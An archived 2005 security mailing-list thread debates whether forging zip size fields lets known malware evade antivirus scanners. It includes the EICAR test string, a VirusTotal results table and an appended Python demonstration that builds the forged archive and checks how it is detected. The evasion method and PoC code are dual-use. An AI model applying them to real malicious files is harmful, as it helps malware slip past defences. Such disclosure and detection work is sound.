Message-ID: <96BCCB62FB25F746A54214CBA0FB94A8048F30@syb-ny-exc1.net.sybari.com>
From: steve_scholz at sybari.com (Steve Scholz)
Subject: Multiple AVVendorIncorrectCRC32BypassVulnerability.
Sure, it is a fair comment. Eicar, a test file, has been corrupted by you changing the archive. Do this with a real virus, where the AV scan engine looks at all the content and, if certain portions are there, it detects it. This PoC only works with Eicar, not any known virus; to me that is no vulnerability.
Steve
________________________________
From: bipin gautam [mailto:visitbipin@...oo.com]
Sent: Sun 3/13/2005 9:06 AM
To: Steve Scholz
Cc: vuln@...unia.com; full-disclosure@...ts.grok.org.uk; bugtraq@...urityfocus.com
Subject: RE: [Full-disclosure] Multiple AVVendorIncorrectCRC32BypassVulnerability.
--- Steve Scholz <steve_scholz@...ari.com> wrote:
> Hi Bipin,
> Well just by definition of what eicar is all you did
> was corrupt a file and made it not useable. I am
> sure that any other executable would do the same.
> Try it with a real virus I am sure there will be
> enough code for the AV scanners to detect.
That's not fair to comment...
DID I CORRUPT THE eicar test string? No, I didn't...
What did I do... then?
In the "local file header" & "data descriptor" of
the archive I just changed the compressed size and
uncompressed size of the archive to greater than the
actual file size.
Who, then? Well, your unzip utility did... so did the
unzip utility built into your AV scanner, so that the
eicar was undetectable to most AV because they just check
the hash of the file to detect eicar!
Result:
Unzip utilities and AV will successfully extract such an
archive, filling in some garbage data \x00 at the end
(because the uncompressed file size was fake). Still,
any malicious code can execute without any problem
with the garbage at its bottom. This will successfully
bypass AV detection "even for a known malicious code",
"MOST OF THE TIME", if the AV detects the executable by
comparing its total checksum!
It's true for some of those simple little viruses,
isn't it?
I didn't alter the eicar test string... in any way.
Take a hex dump of the file and see the intact string
for yourself!
)O; is my English that bad... that I can't
communicate properly?
I hope you understood what I meant to explain.
Moreover, if you are able to forge the CRC right,
'some' old AV may even try to quarantine the test
virus (if it detects it); either way it might still
result in a DoS if the uncompressed file size is
forged to a few hundred MB!
If you are still unclear about the issue, and wonder
how the garbage data came to be at the end of the file...
http://www.geocities.com/visitbipin/winrar.html
This old advisory of mine should explain it to you clearly.
bipin
> --- Steve Scholz <steve_scholz@...ari.com> wrote:
> > Hi Bipin,
> > By design Eicar needs to be the exact string and
> on
> > the first line with nothing else following it. So
> > the file is not actually an Eicar I get this with
> > advanced zip repair. So now we won't detect this
> > because it is not Eicar.
> >
> >
>
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*PK...
> >
> > ./???quot;F?-?sp ?sp .
> eicar.comPK..
> > . . 7 k
>
> "not Eicar" so??? (O; It exactly did what it was
> intended to! TRY IT WITH OTHER EXECUTABLES THEN.
>
> In the "local file header" & "data descriptor", if you
> change the compressed size and uncompressed size to
> greater than the actual file size, there are many AV
> that can't scan the file properly.
> Most unzip utilities will successfully extract such an
> archive with some garbage data \x00 at the end, "255
> bytes". (SO DOES THE AV ENGINE) The garbage data
> doesn't matter that much, because any malicious code can
> "execute without any problem" with the garbage still
> at its end. "This will successfully bypass AV
> detection even for a known malicious code!" "MOST OF
> THE TIME" if the AV detects the executable by comparing
> its total checksum!
>
> (but for effectiveness, FORGE the CRC first, for real
> effectiveness)
>
>
>
> regards,
> bipin gautam
> get the updates in this issue at:
> http://www.geocities.com/visitbipin/
>
> secunia.com;
> > full-disclosure@...ts.grok.org.uk;
> > bugtraq@...urityfocus.com
> > Subject: [Full-disclosure] Re: [Private]Multiple AV VendorIncorrectCRC32BypassVulnerability.
> >
> > Steve,
> > Firstly... thank you for all your comments.
> >
> > > The Antigen_s.zip does not contain a valid Eicar
> > > this info when repaired
> > > and opened is X5O!P%@AP[4\PZX
> > > We did catch it with a file filter.
> > > What was your intent with these files?
> >
> > OOPS! again my fault!!!
> > TRY:
> http://www.geocities.com/visitbipin/Antigen.zip
> >
> > My intention was to show that if the archive has
> > compressed size and uncompressed size set to greater
> > than the actual file size, or less than the actual
> > file size, there are many AV that can't scan the file
> > properly.
> >
> > Send
> > http://www.geocities.com/visitbipin/Antigen.zip
> > to virustotal.com and see for yourself!!!
> >
> > Download Accelerator successfully repairs this archive
> > with some garbage data \x00 at the end, "255 bytes".
> > Though, I was able to successfully execute eicar.com
> >
> > -bipin
> > updates at:
> > http://www.geocities.com/visitbipin/crc.html
> > ___________________My report!_______________________
> > This is a report processed by VirusTotal on 03/12/2005
> > at 18:38:32 (CET) after scanning the "Antigen.zip" file.
> >
> > Antivirus     Version          Update      Result
> > AntiVir       6.30.0.5         03.11.2005  Eicar-Test-Signature
> > AVG           718              03.11.2005  EICAR_Test (+187)
> > BitDefender   7.0              03.12.2005  no virus found
> > ClamAV        devel-20050307   03.10.2005  Eicar-Test-Signature
> > DrWeb         4.32b            03.12.2005  no virus found
> > eTrust-Iris   7.1.194.0        03.12.2005  no virus found
> > eTrust-Vet    11.7.0.0         03.11.2005  no virus found
> > Fortinet      2.51             03.11.2005  no virus found
> > F-Prot        3.16a            03.11.2005  EICAR_Test_File
> > Ikarus        2.32             03.11.2005  EICAR-ANTIVIRUS-TESTFILE
> > Kaspersky     4.0.2.24         03.12.2005  EICAR-Test-File
> > McAfee        4445             03.11.2005  no virus found
> > NOD32v2       1.1024           03.11.2005  archive damaged
> > Norman        5.70.10          03.10.2005  no virus found
> > Panda         8.02.00          03.12.2005  Eicar.Mod
> > Sybari        7.5.1314         03.12.2005  no virus found
> > Symantec      8.0              03.11.2005  no virus found
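The manipulation argued over in the thread, reproduced as an added example (this is not code from either poster, nor from any of the scanners in the VirusTotal list). It builds a single-entry STORED zip around the 68-byte EICAR string, then overstates both size fields in the local file header and the central directory (the data descriptor is left out as a simplification of bipin's setup; the CRC-32 is kept correct for the real bytes). A "lenient extractor" that trusts the claimed size and pads with \x00 is modelled from the behaviour bipin reports, not taken from any named product. Against its output, a detector that matches only the whole-file MD5 (the published EICAR hash) misses, a content signature still hits, and the header-consistency checks a scanner should run flag the archive before any extraction; Python's own zipfile is used to show what a strict parser does with the same bytes.

```python
import hashlib
import io
import struct
import zipfile
import zlib

# The 68-byte EICAR test string, split in two so this source file is not itself
# flagged by a scanner that looks for it.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-" + b"TEST-FILE!$H+H*"
EICAR_MD5 = "44d88612fea8a8f36de82e1278abb02f"  # published MD5 of the exact 68 bytes

SIG_LOCAL, SIG_CENTRAL, SIG_END = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LOCAL_FMT, CENTRAL_FMT, END_FMT = "<HHHHHIIIHH", "<HHHHHHIIIHHHHHII", "<HHHHIIH"


def build_zip(name: bytes, data: bytes, size_overstate: int = 0) -> bytes:
    """Single-entry STORED archive. With size_overstate != 0 both size fields in the
    local header and the central directory become len(data) + size_overstate, the
    manipulation described in the thread; the CRC-32 stays correct for the real
    bytes. No data descriptor is written (simplification of the thread's setup)."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    claimed = len(data) + size_overstate
    local = SIG_LOCAL + struct.pack(LOCAL_FMT, 10, 0, 0, 0, 0, crc, claimed, claimed,
                                    len(name), 0) + name
    central = SIG_CENTRAL + struct.pack(CENTRAL_FMT, 20, 10, 0, 0, 0, 0, crc, claimed,
                                        claimed, len(name), 0, 0, 0, 0, 0, 0) + name
    cd_off = len(local) + len(data)
    end = SIG_END + struct.pack(END_FMT, 0, 0, 1, 1, len(central), cd_off, 0)
    return local + data + central + end


def parse_entry(archive: bytes):
    """Return (method, csize, usize, crc, bytes_present, (cd_csize, cd_usize, cd_crc)).
    bytes_present is what physically sits between the local header and the start
    of the central directory, regardless of what the header claims."""
    eocd = archive.rfind(SIG_END)
    cd_off = struct.unpack_from(END_FMT, archive, eocd + 4)[5]
    lh = struct.unpack_from(LOCAL_FMT, archive, 4)
    method, crc, csize, usize, nlen, xlen = lh[2], lh[5], lh[6], lh[7], lh[8], lh[9]
    present = archive[30 + nlen + xlen:cd_off]
    cd = struct.unpack_from(CENTRAL_FMT, archive, cd_off + 4)
    return method, csize, usize, crc, present, (cd[7], cd[8], cd[6])


def lenient_extract(archive: bytes) -> bytes:
    """Model (assumption, not any product's code) of the extractor behaviour the
    thread reports: trust the claimed uncompressed size, take the bytes that are
    really there, and pad with \\x00 (or truncate) to reach the claimed length."""
    _, _, usize, _, present, _ = parse_entry(archive)
    return (present + b"\x00" * max(0, usize - len(present)))[:usize]


def strict_extract_rejects(archive: bytes) -> bool:
    """True if Python's zipfile refuses to return the entry. The exception type
    depends on the interpreter version: EOFError when the stored data runs out,
    BadZipFile on releases that detect an entry overrunning the central directory."""
    try:
        with zipfile.ZipFile(io.BytesIO(archive)) as zf:
            zf.read(zf.namelist()[0])
        return False
    except (zipfile.BadZipFile, EOFError):
        return True


def detect_by_whole_file_hash(payload: bytes) -> bool:
    """The weak detector the thread argues about: match only on the hash of the
    entire extracted file, so a single trailing byte defeats it."""
    return hashlib.md5(payload).hexdigest() == EICAR_MD5


def detect_by_signature(payload: bytes) -> bool:
    """Content match: the test string is found wherever it sits in the file."""
    return EICAR in payload


def header_findings(archive: bytes) -> list:
    """Consistency checks a scanner should run before trusting the size fields."""
    method, csize, usize, crc, present, cd = parse_entry(archive)
    findings = []
    if method == 0 and csize != usize:
        findings.append("stored entry with compressed size != uncompressed size")
    if csize != len(present):
        findings.append(f"header claims {csize} bytes but {len(present)} are present")
    if zlib.crc32(present) & 0xFFFFFFFF != crc:
        findings.append("crc32 does not match the bytes present")
    if cd != (csize, usize, crc):
        findings.append("central directory disagrees with local header")
    return findings


if __name__ == "__main__":
    forged = build_zip(b"eicar.com", EICAR, size_overstate=255)
    out = lenient_extract(forged)
    print("padded output bytes:", len(out), "hash match:", detect_by_whole_file_hash(out),
          "signature match:", detect_by_signature(out))
    print("header findings:", header_findings(forged))
    print("strict parser rejects:", strict_extract_rejects(forged))
```

The scanner-side lesson is in `header_findings`: a stored entry whose two size fields disagree with each other, with the bytes actually present, or with the central directory should be treated as suspicious in its own right, and content should be scanned from the bytes that exist rather than from whatever a repair-tolerant extractor produces after padding. Steve's objection also holds in this model: the padded output is, by the EICAR definition, no longer the test file, which is exactly why a whole-file hash misses it while a substring signature does not.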